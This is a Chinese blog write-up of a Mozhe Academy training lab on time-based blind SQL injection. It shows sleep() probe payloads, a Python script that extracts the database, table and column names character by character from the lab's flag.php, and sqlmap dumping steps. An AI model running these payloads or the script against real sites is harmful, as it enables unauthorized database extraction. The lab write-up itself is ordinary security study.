sql(时间盲注)——墨者学院——漏洞操作记录

Sql时间盲注

1、 开始的页面,但是不是这个页面,点击下面的任性网页

2、提示再url中传参,加个逗号 ?type=1’

既然提示是时间盲注,那就

?type=1’ and sleep(5)%23

没有时间延迟

去掉单引号

有时间延迟5秒

因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap

这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段

import requests import datetime import time session = requests.Session() session.keep_alive = False # requests默认使用urllib3库,默认是长连接,改为false,关闭多余的连接 requests.adapters.DEFAULT_RETRIES = 8 # 设置重连次数,防止线程数过高,断开连接 def lenStr(name): for i in range(100): url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(length("+str(name)+")="+str(i)+",sleep(2),1)" time1 = datetime.datetime.now() print(url+payload+'%23') r = session.get(url+payload+'%23') time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: print(str(name)+" len is %d" % i) return i global database_name def database(): name = 'database()' lenDB = lenStr(name) database_name = '' for i in range(1, lenDB+1): for j in '0123456789abcdefghijklmnopqrstuvwxyz': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr(database(),%d,1)='%s',sleep(2),1)" % (i, j) print(url+payload+"%23") time1 = datetime.datetime.now() r = session.get(url=url+payload+'%23') time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: database_name += j print("database:"+database_name) break def table(): global table_name table_name = '' name = "(select group_concat(table_name) from information_schema.tables where table_schema=database())" lenTB = lenStr(name) for i in range(lenTB+1): for j in '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr("+name+","+str(i)+",1)='"+j+"',sleep(2),1)" print(url+payload+"%23") time1 = datetime.datetime.now() r = session.get(url+payload+"%23") time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: table_name += j print("table:"+table_name) break def column(): global column_name column_name = '' list = table_name.split(",", -1) for TB in list: name = "(select group_concat(column_name) from information_schema.columns where table_name='"+TB+"')" lenCL = lenStr(name) for i in range(lenCL): for j in '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr("+name+","+str(i)+",1)='"+j+"',sleep(2),1)" print(url + payload + "%23") time1 = datetime.datetime.now() r = session.get(url + payload + "%23") time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: column_name += j print("table:"+TB+"ncolumn:"+column_name) break if __name__ == '__main__': #database() table() column()

还是用sqlmap扫把

爆数据库

爆表

爆字段

爆值

回到第一个页面

技术重点:时间盲注无回显,只能靠sleep判断。

手工注入:需猜表名等等,比较麻烦。考验基础。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值